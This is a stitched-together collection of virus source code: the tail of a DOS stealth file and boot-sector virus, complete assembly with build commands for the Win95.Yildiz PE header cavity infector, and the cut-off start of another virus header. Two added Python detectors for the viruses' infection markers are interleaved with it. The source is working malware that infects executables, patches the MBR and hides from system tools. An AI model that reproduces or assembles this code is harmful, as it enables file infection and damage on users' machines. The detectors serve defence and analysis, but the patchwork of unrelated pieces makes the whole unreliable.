                POP CX
                POP BX
                POP AX
                POP ES

                JE Stealth_Handle

                JMP JMP_Old_Int21h

Check_60_Secs:  MOV AL, CL

                OR CL, (62/2)                   ; Set 60 seconds.
                DEC CX

                XOR AL, CL

                RETN
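The two "already infected" markers this virus tests for itself (the 60-second timestamp of Test_Seconds/Check_60_Secs, and the active partition start patched to head 0, sector 2 by Chk_Partition) turned into checks a defender can run over raw FAT directory entries and an MBR image, as an added example in Python (not part of the disassembly). VIRUS_SIZE is taken from the family name Ginger.2782; the directory and MBR bytes are constructed.

```python
import struct

# Added example, not part of the Bad Seed listing. Mirrors the virus's own
# infection markers as defensive checks; all sample data is constructed.

VIRUS_SIZE = 2782                      # from the family name Ginger.2782

def dos_time_seconds(time_word: int) -> int:
    """Seconds field of a DOS/FAT time word: the low 5 bits hold seconds/2."""
    return (time_word & 0x1F) * 2

def has_60_second_marker(time_word: int) -> bool:
    """Mirror of Check_60_Secs: an infected file carries the impossible value
    of 60 seconds (low 5 bits == 30), which DOS never writes on its own."""
    return (time_word & 0x1F) == 60 // 2

# Standard 32-byte FAT directory entry (not the virus's FCB layout):
# name(11) attr(1) reserved(10) time(2) date(2) first cluster(2) size(4).
DIR_ENTRY = struct.Struct("<11sB10sHHHI")

def marked_entries(directory: bytes):
    """Return [(name, host_size, size_on_disk)] for every entry whose time
    word carries the marker. A resident copy hides these via FCB stealth;
    reading the raw directory sectors from a clean boot bypasses that."""
    hits = []
    for off in range(0, len(directory) - DIR_ENTRY.size + 1, DIR_ENTRY.size):
        name, attr, _, time_w, _, _, size = DIR_ENTRY.unpack_from(directory, off)
        if name[0] in (0x00, 0xE5) or attr & 0x08:   # free, deleted, label
            continue
        if has_60_second_marker(time_w):
            base = name[:8].decode("ascii", "replace").rstrip()
            ext = name[8:].decode("ascii", "replace").rstrip()
            hits.append((f"{base}.{ext}", size - VIRUS_SIZE, size))
    return hits

PART_TABLE = 0x1BE

def redirected_active_partition(mbr: bytes) -> int:
    """Index (0-3) of an active partition whose start CHS is cylinder 0,
    head 0, sector 2: where Chk_Partition points it and what the virus
    compares against 0200h to recognise an infected MBS. -1 if none.
    Heuristic: a genuine partition starting there is unusual, not impossible."""
    if len(mbr) < 512 or mbr[510:512] != b"\x55\xAA":
        return -1
    for i in range(4):
        e = mbr[PART_TABLE + 16 * i: PART_TABLE + 16 * i + 16]
        boot_flag, head, sector_cyl_hi, cyl_lo = e[0], e[1], e[2], e[3]
        if boot_flag & 0x80 and head == 0 and sector_cyl_hi == 0x02 and cyl_lo == 0:
            return i
    return -1

def make_mbr(head: int, sector: int) -> bytes:
    """Constructed MBR with one active FAT16 partition (type 06h) starting at
    the given head/sector of cylinder 0; LBA fields are left zero."""
    mbr = bytearray(512)
    entry = bytes([0x80, head, sector, 0x00, 0x06, 0xFE, 0x3F, 0x7F]) + bytes(8)
    mbr[PART_TABLE:PART_TABLE + 16] = entry
    mbr[510:512] = b"\x55\xAA"
    return bytes(mbr)

# Constructed directory: GAME.COM carries the marker (12:17:60), README.TXT
# does not (12:17:00); a zeroed entry ends the directory.
SAMPLE_DIR = (
    DIR_ENTRY.pack(b"GAME    COM", 0x20, bytes(10), 0x623E, 0x2A21, 5, 4016)
    + DIR_ENTRY.pack(b"README  TXT", 0x20, bytes(10), 0x6220, 0x2A21, 9, 77)
    + bytes(32)
)
CLEAN_MBR = make_mbr(head=1, sector=1)            # classic DOS layout
INFECTED_MBR = make_mbr(head=0, sector=2)         # as patched by Chk_Partition
```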

Stealth_Handle: PUSH DS

                PUSH DX


                PUSH CX
                PUSH AX

                PUSH CS
                POP DS

                MOV Read_Count, CX              ; Save CX for later use.

                XOR CX, CX

                MOV New_Read_Count, CX

                MOV AX, 4201h                   ; Get current file position.
                XOR DX, DX
                CALL Do_Old_Int21h

                MOV File_Pos, AX                ; Save it for later.
                MOV File_Pos+2, DX

                MOV AX, 4202h                   ; Get filesize.
                XOR DX, DX
                CALL Do_Old_Int21h

                SUB AX, Virus_Size              ; Get original filesize.
                SBB DX, 0

                MOV Orig_Size, AX               ; Save it.
                MOV Orig_Size+2, DX

                POP AX

                CMP AH, 42h                     ; It is a seek EOF relative?
                JNE Rest_File_Pos

                POP CX                          ; CX:DX = EOF displacement.
                POP DX

                POP DS

                PUSH CX

                SUB DX, Virus_Size              ; Do the seek relative to
                SBB CX, 0                       ; the clean filesize instead
                CALL Do_Old_Int21h              ; of the infected size.

                POP CX

                JMP IRET_Flags

JMP_Cln_Handle: JMP Clean_Handle

Rest_File_Pos:  PUSH AX

                MOV AX, 4200h                   ; Restore original position.
                MOV DX, File_Pos
                MOV CX, File_Pos+2
                CALL Do_Old_Int21h

                OR DX, DX                       ; They're attempting to
                JNZ JA_Chk_Body_Rd              ; access the 1st 64k ?

                CMP AX, 23                      ; The header in particular?
JA_Chk_Body_Rd: JA Chk_Body_Reach


                POP AX                          ; Restore AX & CX.
                POP CX
                PUSH CX
                PUSH AX

                CMP AH, 3Fh                     ; It is a read?
                JNE JMP_Cln_Handle              ; Else it's a write.

                MOV AX, CX                      ; AX = bytes to read.

                ADD CX, File_Pos                ; Calculate end offset after
                                                ; the read.

                JC Calc_Count_Hdr               ; Above 64k ?

                CMP CX, 24                      ; Does the read touch the
                JB Sub_St_Size                  ; entire header?

Calc_Count_Hdr: MOV AX, 24                      ; Calculate how many bytes
                SUB AX, File_Pos                ; to stealth in the header.

                MOV New_Read_Count, AX          ; Save the new read count.

Sub_St_Size:    SUB Read_Count, AX              ; The header will be read by
                                                ; the virus, so adjust the
                                                ; caller read count.

                PUSH AX

                MOV AX, 4200h                   ; Seek to the host's clean
                MOV CX, Orig_Size+2             ; header. *** The caller's
                MOV DX, Orig_Size               ; header offset should be
                ADD DX, OFFSET Host_Header      ; added as well, now it screws
                ADC CX, 0                       ; up on header reads that
                CALL Do_Old_Int21h              ; don't start at offset 0.

                POP CX                          ; CX = how many bytes to
                                                ; stealth in header.

                PUSH BP
                MOV BP, SP

                LDS DX, [BP+(3*2)]              ; Read buffer of the caller.

                POP BP

                MOV AH, 3Fh                     ; Read the clean header
                CALL Do_Old_Int21h              ; into the caller's buffer.

                PUSH CS
                POP DS

                PUSH AX
                PUSH CX

                ADD File_Pos, AX                ; Update saved position.
                ADC File_Pos+2, 0

                MOV DX, File_Pos                ; Restore file position.
                MOV CX, File_Pos+2
                MOV AX, 4200h
                CALL Do_Old_Int21h

                POP CX


                POP AX

                SUB CX, AX              ; Not all bytes were read?
                JNZ Error_St_Exit       ; Then bail.

                CMP Read_Count, 0       ; No more bytes need to be
                JNZ Chk_Body_Reach      ; read? Then IRET back.

                POP CX
                POP CX

                MOV AX, CX              ; AX = 0.

                JZ Exit_Stealth_1

Error_St_Exit:  POP DX
                POP DX

Exit_Stealth_1: POP DX
                POP DS

                JMP IRET_Flags

Chk_Body_Reach: POP AX                  ; Value of AX on entry.
                PUSH AX

                MOV CX, File_Pos        ; Original fileposition
                MOV DX, File_Pos+2      ; where the action starts.

                CMP DX, Orig_Size+2     ; Below virus' 64k ?
                JB Calc_End_Pos

                CMP CX, Orig_Size       ; Below virus' code? If not,
                JBE Calc_End_Pos        ; the virusbody gets read or
                                        ; overwritten, so stealth it.

                CMP AH, 40h             ; If it's a write then go
                JE Clean_Handle         ; disinfect the handle.

                POP AX
                POP CX

                XOR AX, AX              ; Return 0 bytes read when
                JZ Exit_Stealth_1       ; they try to read from after
                                        ; the original host.

Calc_End_Pos:   ADD CX, Read_Count      ; Calculate end position
                ADC DX, 0               ; after the read/write.

                CMP DX, Orig_Size+2     ; Below the virusbody?
                JB Do_Function

                CMP CX, Orig_Size
                JBE Do_Function

                CMP AH, 40h             ; If it's a write then
                JE Clean_Handle         ; disinfect the handle.

                MOV CX, Orig_Size
                MOV DX, Orig_Size+2

                SUB CX, File_Pos
                SBB DX, File_Pos+2


                OR DX, DX               ; *** Obsolete instruction.
                JZ Set_New_Byte_C

                MOV CX, -1
                SUB CX, New_Read_Count

Set_New_Byte_C: MOV Read_Count, CX

Do_Function:    POP AX
                POP CX
                POP DX
                POP DS
                PUSH CX

                PUSH AX
                PUSH DX

                MOV CX, CS:Read_Count
                ADD DX, CS:New_Read_Count
                CALL Do_Old_Int21h

                ADD AX, CS:New_Read_Count

                POP DX
                POP CX

                CMP CH, 3Fh             ; It aint a read? Then it's
                JE Exit_Stealth_2       ; a get/set filedate & time.

                PUSH AX
                PUSH DX

                MOV AX, 5700h           ; Get file's date & time.
                CALL Do_Old_Int21h

                INC AL                  ; AX = 5701h.
                OR CL, (62/2)           ; Set 60 seconds.

                DEC CX
                CALL Do_Old_Int21h

                POP DX
                POP AX

Exit_Stealth_2: POP CX
                JMP IRET_Flags

Clean_Handle:   MOV WORD PTR Valid_Handle, 0001h
                MOV File_Handle, BL

                MOV AX, 4200h           ; Seek to the old header.
                MOV CX, Orig_Size+2
                MOV DX, Orig_Size
                ADD DX, OFFSET Host_Header
                ADC CX, 0
                CALL Do_Old_Int21h

                MOV AH, 3Fh             ; Read it in.
                MOV CX, 24
                MOV DX, OFFSET Buffer

                NOP
                CALL Do_Old_Int21h


                MOV AX, 4200h           ; Seek to the old EOF.
                MOV DX, Orig_Size
                MOV CX, Orig_Size+2
                CALL Do_Old_Int21h

                MOV AH, 40h             ; Write new EOF marker.
                XOR CX, CX
                CALL Do_Old_Int21h

                MOV AX, 4200h           ; Seek to BOF.
                XOR CX, CX
                XOR DX, DX
                CALL Do_Old_Int21h

                MOV AH, 40h             ; Restore old header.
                MOV CX, 24
                MOV DX, OFFSET Buffer

                NOP
                CALL Do_Old_Int21h

                MOV AX, 4200h           ; Restore original file pos.
                MOV DX, File_Pos
                MOV CX, File_Pos+2
                CALL Do_Old_Int21h

                POP AX
                POP CX
                POP DX
                POP DS

                JMP SHORT JMP_Old_Int21h

Check_Win_Exit: POP BX                  ; Remove return IP off stack.
                POP CX                  ; POP program's return CS.

                PUSH CX
                PUSH BX
                PUSH AX

                DEC CX                  ; Get program's MCB.
                MOV DS, CX

                MOV SI, 8               ; SI = name of terminating
                                        ; program.

                CLD                     ; Fetch 1st word of filename.
                LODSW
                XCHG BX, AX

                LODSW                   ; Fetch 2nd word of filename.
                XCHG DX, AX

                POP AX

                CMP BX, 'IW'            ; Is it WIN.COM that's
                JNE J2_J_Old_i21h       ; terminating?

                CMP DX, 'N'
                JNE J2_J_Old_i21h


                DEC CS:Windows_Active   ; If so, reset the flag.

J2_J_Old_i21h:  JMP SHORT JMP_Old_Int21h

Stealth_Seconds:
                PUSH AX
                PUSH CX
                PUSH DX

                MOV AX, 5700h           ; Get file's date & time.
                CALL Do_Old_Int21h

                PUSH AX
                PUSH CX

                CALL Check_60_Secs      ; Check if it's infected.

                POP CX
                POP AX

                POP DX
                POP CX
                POP AX

                JNE JMP_Old_Int21h      ; If it ain't then get out.

                OR AL, AL               ; Get file date & time?
                JNZ Stealth_Set         ; Else it's a set.

                CALL Do_Old_Int21h      ; Do the call.

                AND CL, 11100000b       ; Clear seconds.
                JMP IRET_Flags

Stealth_Set:    OR CL, (62/2)           ; Set 60 seconds.
                DEC CX

                JNZ JMP_Old_Int21h      ; This jump is always taken.

Do_Old_Int21h:  PUSHF                   ; Simulate an interrupt 21h.
                CALL DWORD PTR CS:Old_Int21h

                RETN

JMP_Old_Int21h: JMP DWORD PTR CS:Old_Int21h

Host_Header:    DB 0CDh, 20h
                DB 22 DUP (0)

; This ISR stealths the first INT 12h and then unhooks itself, this way
; MEM and CHKDSK will report the untouched total DOS memory size.

New_Int12h:
                PUSH DS
                PUSH ES
                PUSH BX

                XOR AX, AX              ; DS = IVT.
                MOV DS, AX

                LES BX, DWORD PTR CS:Old_Int12h

                CLI                     ; Restore original INT 12h.


                MOV DS:[(12h*4)], BX
                MOV DS:[(12h*4)+2], ES
                STI

                POP BX
                POP ES
                POP DS

                INT 12h                 ; Do the original INT 12h.

                ADD AX, Virus_Size_1024 ; Stealth DOS memory size.

                IRET

                DB '10/23/92', 0
Origin          = BYTE PTR $-1

File_Int21h:    CMP AX, 0EEE7h          ; Residency check?
                JE Return_ID_2

                CMP AX, 3513h           ; Get INT 13h ?
                JE Get_Int13h_St

                CMP AX, 3521h           ; Get INT 21h ?
                JE Get_Int21h_St

                CMP AX, 2513h           ; Set INT 13h ?
                JE Set_Int13h_St

                CMP AX, 2521h           ; Set INT 21h ?
                JE Set_Int21h_St

                JMP DWORD PTR CS:600h+(Old_Int21h-File_Int21h)

Return_ID_2:    MOV AX, 0D703h          ; Return ID word to caller.
                IRET

Get_Int13h_St:  LES BX, DWORD PTR CS:600h+(Old_Int13h-File_Int21h)
                IRET

Get_Int21h_St:  LES BX, DWORD PTR CS:600h+(Old_Int21h-File_Int21h)
                IRET

Set_Int13h_St:  MOV CS:600h+(Old_Int13h-File_Int21h), DX
                MOV CS:600h+(Old_Int13h-File_Int21h)+2, DS
                IRET

Set_Int21h_St:  MOV CS:[600h+(Old_Int21h-File_Int21h)], DX
                MOV CS:[600h+(Old_Int21h-File_Int21h)+2], DS
                IRET

Act_Partition   DW 0

Boot_Int13h:    CMP DX, 80h             ; 1st HD - head zero?
                JNE JMP_Boot_i13h

                CMP CX, Virus_Size_512+2 ; Operation concerns the
                JNB JMP_Boot_i13h       ; MBS or virussectors?


                CMP AH, 02h             ; Sector read?
                JE Check_For_MBS

                CMP AH, 03h             ; Sector write?
                JE Check_For_MBS

JMP_Boot_i13h:  JMP DWORD PTR CS:[0000h] ; Jump to the previous ISR.
Ofs_Old_Int13h  = WORD PTR $-2

Check_For_MBS:  CMP CX, 1               ; It's the MBS ?
                JNE Check_If_Write

                CMP AH, 02h             ; It is a MBS read?
                JE Do_Read_Write        ; Else it's a write.

                PUSH SI

                CALL Get_Act_Partition  ; Get delta offset to active
                                        ; partition.

                MOV ES:[BX+SI], 0200h   ; Set the infected partition
                                        ; in the MBS so the written
                                        ; MBS will still be infected.

                POP SI

Do_Read_Write:  PUSH AX

                MOV AL, 1               ; Only read/write to the MBS.

                PUSHF                   ; Carry out the read/write.
                CALL DWORD PTR CS:[0]

Ofs_Real_Int13h = WORD PTR $-2

                POP AX

                CMP AH, 03h             ; It was a write?
                JE Success_IRET

                PUSH SI                 ; Else stealth the read.

                CALL Get_Act_Partition

                MOV ES:[BX+SI], 0101h   ; Put back the original
                                        ; MS-DOS partition start.

                POP SI

                CMP AL, 1
                JE Success_IRET

Check_If_Write: CMP AH, 03h             ; It was a write?
                JE Success_IRET

                PUSH AX
                PUSH CX
                PUSH DX
                PUSH DI

                XOR AH, AH

                MOV DI, BX              ; ES:DI = readbuffer.

                CMP CX, 1
                MOV CX, 512


                JNE Calc_Sec_Size

                DEC AX                  ; Skip the MBS.
                ADD DI, CX              ; Next sector.

Calc_Sec_Size:  MUL CX                  ; Sectorcount * 512.

                OR DX, DX
                JZ Clear_Buffer

                MOV CX, 0

Clear_Buffer:   XCHG CX, AX

                CLD

Clear_Byte:     STOSB
                LOOP Clear_Byte

                POP DI
                POP DX
                POP CX
                POP AX

Success_IRET:   CLC                     ; Mark success. *** The next
                                        ; XOR clears CF already.

                XOR AH, AH

IRET_Flags:     PUSH AX
                LAHF

                PUSH BP
                MOV BP, SP

                MOV [BP+(4*2)], AH      ; Set new flags in stack.

                POP BP
                POP AX

                IRET

; Gets the active partition.

Get_Act_Partition:
                CALL Get_Delta_2
Get_Delta_2:    POP SI

                SUB SI, OFFSET Get_Delta_2

                MOV SI, CS:[SI+Act_Partition]

                RETN

End_Body:

Old_Int08h      = WORD PTR $+0
Old_Int21h      = WORD PTR $+4
Old_Int01h      = WORD PTR $+8
Old_Int12h      = WORD PTR $+8
Old_Int13h      = WORD PTR $+12
Real_Int13h     = WORD PTR $+16
Buffer          = $+20
Read_Count      = WORD PTR $+44
Host_Size       = WORD PTR $+44


New_Read_Count  = WORD PTR $+46
File_Pos        = WORD PTR $+48
Host_Type       = BYTE PTR $+49
Orig_Size       = WORD PTR $+52
Valid_Handle    = BYTE PTR $+56
File_Handle     = BYTE PTR $+57

EXE_Header      STRUC
EXE_ID          DW 0
Image_Mod_512   DW 0
File_512_Pages  DW 0
Reloc_Items     DW 0
Header_Size     DW 0
Min_Size_Mem    DW 0
Max_Size_Mem    DW 0
Program_SS      DW 0
Program_SP      DW 0
Checksum        DW 0
Program_IP      DW 0
Program_CS      DW 0
Reloc_Table     DW 0
EXE_Header      ENDS

Find_FN_FCB     STRUC
FCB_Drive       DB 0
FCB_Name        DB 8 DUP(0)
FCB_Ext         DB 3 DUP(0)
FCB_Attr        DB 0
FCB_Reserved    DB 10 DUP(0)
FCB_Time        DW 0
FCB_Date        DW 0
FCB_Start_Clust DW 0
FCB_Size        DW 0, 0
Find_FN_FCB     ENDS

END START


; *************************************************************************
; ********************                                 ********************
; ********************          Win95.Yildiz           ********************
; ********************               by                ********************
; ********************           Black Jack            ********************
; ********************                                 ********************
; *************************************************************************
;
;
;NAME:          Win95.Yildiz
;AUTHOR:        Black Jack [independent Austrian Win32asm virus coder]
;CONTACT:       [email protected] | http://www.coderz.net/blackjack
;TYPE:          Win9x direct acting/global ring3 resident PE header cavity virus
;SIZE:          323 bytes (but of course infected files won't increase in size)
;
;DESCRIPTION:   When an infected file is run, the virus takes control. It then
;               tries to find the kernel32 base address by a simple algorithm
;               which should make it compatible with Win9X and WinME (although I
;               haven't tested it with the second one). After that it gets the
;               undocumented Win9X API VxDCall0 and uses it to call int 21h. The
;               VxDCall0 API is the very first exported API in Win9X; I don't
;               know which API is first in WinNT, that's why unpredictable
;               results may occur when the virus runs in that OS (I haven't tried
;               it out, but of course the virus can't work in NT).
;               Then it goes TSR (read more about this a bit later), and infects
;               all PE EXE files in the current directory by overwriting the
;               unused padding bytes in the PE header with the virus body.
;               The memory residency consists in infecting kernel32.dll in memory.
;               To do so, it creates a temporary file called "Yildiz." and writes
;               the first 4KB of kernel32.dll there. Then this file is infected
;               like any other PE file. And finally the content of the infected
;               temp file is read back into kernel32 memory. Yep, you have read
;               right, by using the int21h with VxDCall0 you can read from a file
;               into read-only memory! (This trick was discovered by Murkry/IkX,
;               read more about it in the comments to his Darkside virus source,
;               published in Xine#3).
;               As I have already said, the kernel32 is infected in memory just
;               like any other file, this means the entry point is set to the
;               virus, no APIs are hooked. As you should know, the entry point
;               of a DLL is an init routine that is called whenever the DLL is
;               loaded by a program. And since kernel32 is imported by all
;               programs, this means for us that whenever a program is run (and
;               kernel32 is mapped into the program's address space), our virus
;               will infect all PE EXE files in the directory of the program.
;
;ASSEMBLE WITH: tasm32 /mx /m yildiz.asm
;               tlink32 /Tpe /aa yildiz.obj,,, import32.lib
;
;               there's no need for PEWRSEC or a similar tool, because the
;               virus code is supposed to run in read-only memory anyways.
;
;DISCLAIMER:    I do *NOT* support the spreading of viruses in the wild.
;               Therefore, this source was only written for research and
;               education. Please do not spread it. The author can't be held
;               responsible for what you decide to do with this source.
; ===========================================================================

virus_size      EQU (virus_end - virus_start)

Extrn MessageBoxA : Proc                ; for first generation only
Extrn ExitProcess : Proc


.386p

.model flat

.data
                dd 0                    ; dummy data, you know...

.code
virus_start:

                pushad                  ; save all registers

                xchg edi, eax           ; put delta offset to EDI (EAX=start
                                        ; offset of program by default)

                mov eax, [esp+8*4]      ; EAX=some address inside kernel32

                sub esp, size stack_frame ; reserve room on stack
                mov esi, esp            ; set ESI to our data on the stack

search_kernel32:
                xor ax, ax              ; we assume the least significant
                                        ; word of the kernel32 base is zero
                cmp word ptr [eax], "ZM" ; is there a MZ header ?
                JE found_kernel32       ; if yes, we found the correct
                                        ; kernel32 base address
                dec eax                 ; 0BFF80000->0BFF7FFFF, and then the
                                        ; least significant word is zeroed
                JMP search_kernel32     ; check next possible kernel32 base

tmp_filename    db "Yildiz", 0
filespec        db "*.EXE", 0

found_kernel32:
                mov ebx, [eax+3Ch]      ; EBX=kernel32 PE header RVA
                add ebx, eax            ; EBX=offset of kernel32 PE header

                mov ebx, [ebx+120]      ; EBX=export table RVA
                mov ebx, [ebx+eax+1Ch]  ; EBX=Address array of API RVAs
                mov ebx, [ebx+eax]      ; get the first API RVA: VxDCall0
                add ebx, eax            ; EBX=Offset VxDCall0 API
                mov [esi.VxDCall0], ebx ; save it
                lea ebp, [edi+int21h-virus_start] ; EBP=offset of our int21h procedure
                                        ; for optimisation reasons, the
                                        ; CALL EBP instruction is just 2 bytes

; ----- GO TSR --------------------------------------------------------------

                lea edx, [edi+tmp_filename-virus_start] ; EDX=pointer to tmp filename
                push edx                ; save it on stack

                push eax                ; save kernel32 base address on stack

                mov ah, 3Ch             ; create temp file
                xor ecx, ecx            ; no attributes
                call ebp                ; call our int 21h procedure

                xchg ebx, eax           ; filehandle to EBX, where it belongs

                pop edx                 ; EDX=kernel32 base address
                push edx                ; save it again

                call write_file         ; write start of kernel32 to temp file


call infect ; infect the temp file

pop edx ; EDX=kernel32 base address

                mov ah, 3Fh             ; read infected kernel32 filestart
                call read_write         ; into kernel32 memory

                mov ah, 3Eh             ; close temp file
                call ebp                ; call our int 21h procedure

                pop edx                 ; EDX=pointer to temp filename
                mov ah, 41h             ; delete temp file
                call ebp                ; call our int 21h procedure

; ----- INFECT ALL FILES IN CURRENT DIR -------------------------------------

                mov ah, 2Fh             ; get DTA
                call ebp                ; call our int 21h procedure

                push es                 ; save DTA address to stack
                push ebx

                push ds                 ; ES=DS (standard data segment)
                pop es

                mov ah, 1Ah             ; set DTA to our data area
                lea edx, [esi.dta]      ; DS:EDX=new DTA address
                call ebp                ; call our int 21h procedure

                mov ah, 4Eh             ; find first file
                xor ecx, ecx            ; only files with standard attributes
                lea edx, [edi+(filespec-virus_start)] ; EDX=offset of filespec

findfile_loop:
                call ebp                ; call our int 21h procedure
                JC all_done             ; no more files found?

                mov ax, 3D02h           ; open victim file for read and write
                lea edx, [esi.dta+1Eh]  ; DS:EDX=pointer to filename in DTA
                call ebp                ; call our int 21h procedure

                xchg ebx, eax           ; handle to EBX, where it belongs

                call infect             ; infect the file

                mov ah, 3Eh             ; close the victim file
                call ebp                ; call our int 21h procedure

search_on:
                mov ah, 4Fh             ; find next file
                JMP findfile_loop

; ----- RESTORE HOST --------------------------------------------------------

all_done:
                pop edx                 ; restore old DTA offset in DS:EDX
                pop ds
                mov ah, 1Ah             ; reset DTA to old address
                call ebp                ; call our int 21h procedure


                push es                 ; DS=ES (standard data segment)
                pop ds

add esp , size stack_frame ; remove our data buffer from stack

popad ; restore all registers

                db 05h                  ; add eax, imm32
entry_RVA_difference dd (host - virus_start) ; difference between host and
                                        ; virus entrypoint (EAX is virus
                                        ; entrypoint offset by default)

JMP eax ; jump to host entrypoint

; ----- END MAIN PART OF THE VIRUS CODE -------------------------------------

exit_infect:
                pop edi                 ; restore EDI (delta offset)
                RET                     ; return to caller

; ----- INFECT AN OPENED FILE (HANDLE IN BX) --------------------------------

infect:
                push edi                ; save EDI (delta offset)

                mov edx, esi            ; EDX=read/write buffer offset
                mov ah, 3Fh             ; read start of file
                call read_write

                cmp word ptr [esi], "ZM" ; is it an exe file ?
                JNE exit_infect         ; cancel infection if not

                mov ecx, [esi+3Ch]      ; ECX=new header RVA
                cmp ecx, 3*1024         ; check if DOS stub is small enough
                                        ; so that all the PE header is in
                                        ; our buffer
                JA exit_infect          ; if not, cancel infection

                lea edi, [esi+ecx]      ; EDI=PE header offset in memory
                cmp word ptr [edi], "EP" ; is it a PE file ?
                                        ; (I know that the PE marker is
                                        ; actually a dword, but by only
                                        ; checking one word we save a byte
                                        ; of virus code)
                JNE exit_infect         ; cancel infection if not

                cmp dword ptr [edi+28h], 4096 ; check if entrypoint RVA is in the
                                        ; first 4 KB of the file
                JB exit_infect          ; if yes, the file must be already
                                        ; infected, cancel infection

                add ecx, 24             ; add size of FileHeader
                movzx eax, word ptr [edi+14h] ; EAX=size of Optional header
                add ecx, eax            ; add it to ECX
                movzx eax, word ptr [edi+6] ; EAX=NumberOfSections
                imul eax, eax, 40       ; get size of section headers to EAX
                add ecx, eax            ; add it to ECX, now it points to the
                                        ; end of the used part of the PE
                                        ; header, where the virus will be.

                mov edx, ecx            ; EDX=virus RVA
                xchg dword ptr [edi+28h], edx ; set it as new entrypoint RVA
                sub edx, ecx            ; EDX=difference between old and new
                                        ; entrypoint RVA


                mov eax, [edi+54h]      ; EAX=SizeOfHeaders (aligned to
                                        ; FileAlign)

                lea edi, [esi+ecx]      ; EDI=virus offset in buffer

                sub eax, ecx            ; EAX=free room for us to use
                mov cx, virus_size      ; ECX=size of virus (the most
                                        ; significant word of ECX should be 0)
                cmp eax, ecx            ; enough room for the virus ?
                JL exit_infect          ; cancel infection if not

                pop eax                 ; EAX=delta offset
                push eax                ; save it again to stack
                xchg esi, eax           ; ESI=delta offset, EAX=data buffer

                cld                     ; clear direction flag
                rep movsb               ; move virus body into buffer

                xchg esi, eax           ; ESI=pointer to our data on stack

                mov [edi-(virus_end-entry_RVA_difference)], edx ; store difference
                                        ; between old and new entrypoint

                pop edi                 ; restore EDI (delta offset)

                mov edx, esi            ; EDX=offset of read/write buffer

                                        ; now write modified start of file,
                                        ; then return to caller

write_file:
                mov ah, 40h             ; write to file

read_write:
                xor ecx, ecx            ; ECX=0
                pushad                  ; save all registers

                xor eax, eax            ; EAX=4200h (set filepointer from
                mov ah, 42h             ; start of the file
                cdq                     ; CX:DX=0 (new filepointer)
                call ebp                ; call our int 21h procedure

                popad                   ; restore all registers

                mov ch, 10h             ; ECX=4096 (size of read/write buffer)

                                        ; now execute int 21h and return

int21h:                                 ; protected mode int21
                push ecx                ; push parameters
                push eax
                push 2A0010h            ; VWIN32_Int21Dispatch function
                call ss:[esi.VxDCall0]  ; call VxDCall0 API
                ret

virus_end:

; This is our data that will be stored on the stack:

stack_frame     struc
buffer          db 4096 dup (?)
dta             db 43 dup (?)


VxDCall0        dd ?
stack_frame     ends

host:
                push 0
                push offset caption
                push offset message
                push 0
                call MessageBoxA

                push 0
                call ExitProcess

caption         db "Win95.Yildiz Virus (c) 2000 Black Jack", 0
message         db "first generation dropper", 0

end virus_start
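The header-cavity technique described above leaves a measurable trace in any infected PE: the entry point RVA no longer points into a section but into the padding between the last section header and SizeOfHeaders. The following Python is an added detection example, not code from the zine or its author; it reads only the header fields the description names (e_lfanew, NumberOfSections, SizeOfOptionalHeader, AddressOfEntryPoint, SizeOfHeaders), and the two PE images it checks are constructed, headers-only samples.

```python
import struct

# Field offsets are those of the PE format (and the ones the description
# above uses): e_lfanew at 0x3C in the MZ header; then, relative to the
# "PE\0\0" signature, NumberOfSections at +6, SizeOfOptionalHeader at +0x14,
# AddressOfEntryPoint at +0x28 and SizeOfHeaders at +0x54.
FILE_HEADER_SIZE = 24       # 4-byte signature + 20-byte IMAGE_FILE_HEADER
SECTION_HEADER_SIZE = 40


def parse_pe_header(data: bytes) -> dict:
    """Return the header fields needed for the cavity check (raises on non-PE input)."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if e_lfanew + 0x58 > len(data) or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("no PE signature at e_lfanew")
    sections = struct.unpack_from("<H", data, e_lfanew + 6)[0]
    opt_size = struct.unpack_from("<H", data, e_lfanew + 0x14)[0]
    entry = struct.unpack_from("<I", data, e_lfanew + 0x28)[0]
    hdr_size = struct.unpack_from("<I", data, e_lfanew + 0x54)[0]
    # End of the part of the header the loader actually uses. Everything from
    # here up to SizeOfHeaders is alignment padding: the cavity a header
    # infector overwrites.
    used_end = e_lfanew + FILE_HEADER_SIZE + opt_size + SECTION_HEADER_SIZE * sections
    return {"e_lfanew": e_lfanew, "entry": entry, "size_of_headers": hdr_size,
            "used_end": used_end, "cavity": max(hdr_size - used_end, 0)}


def check_header_cavity(data: bytes) -> dict:
    """Flag an entry point that lies inside the header instead of a section.

    Headers are mapped at RVA 0, so AddressOfEntryPoint < SizeOfHeaders means
    execution starts inside the header image; an entry point at or past
    used_end means it starts in the padding itself.
    """
    f = parse_pe_header(data)
    in_headers = f["entry"] < f["size_of_headers"]
    in_padding = in_headers and f["entry"] >= f["used_end"]
    return {"entry_in_headers": in_headers, "entry_in_padding": in_padding,
            "cavity_bytes": f["cavity"]}


def build_sample_pe(entry_point: int, size_of_headers: int = 0x400) -> bytes:
    """Constructed, headers-only PE32 image with one section (sample data only)."""
    e_lfanew, opt_size = 0x80, 0xE0
    buf = bytearray(size_of_headers)
    buf[0:2] = b"MZ"
    struct.pack_into("<I", buf, 0x3C, e_lfanew)
    buf[e_lfanew:e_lfanew + 4] = b"PE\0\0"
    struct.pack_into("<HH", buf, e_lfanew + 4, 0x14C, 1)       # Machine, NumberOfSections
    struct.pack_into("<H", buf, e_lfanew + 0x14, opt_size)     # SizeOfOptionalHeader
    struct.pack_into("<H", buf, e_lfanew + 0x18, 0x10B)        # PE32 magic
    struct.pack_into("<I", buf, e_lfanew + 0x28, entry_point)  # AddressOfEntryPoint
    struct.pack_into("<I", buf, e_lfanew + 0x54, size_of_headers)
    sec = e_lfanew + FILE_HEADER_SIZE + opt_size               # first section header
    buf[sec:sec + 8] = b".text\0\0\0"
    struct.pack_into("<II", buf, sec + 8, 0x1000, 0x1000)      # VirtualSize, VirtualAddress
    return bytes(buf)


if __name__ == "__main__":
    clean = build_sample_pe(0x1000)   # entry in .text, the normal case
    cavity = build_sample_pe(0x1A0)   # entry at used_end, where a cavity infector puts it
    for name, image in (("clean", clean), ("cavity", cavity)):
        print(name, check_header_cavity(image))
```

In the constructed sample used_end is 0x80 + 24 + 0xE0 + 40 = 0x1A0, leaving 608 bytes of padding, more than the 323 bytes the description says the body needs.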


comment \

Name            : CU.1076 (according to AVP, obviously named after the infection
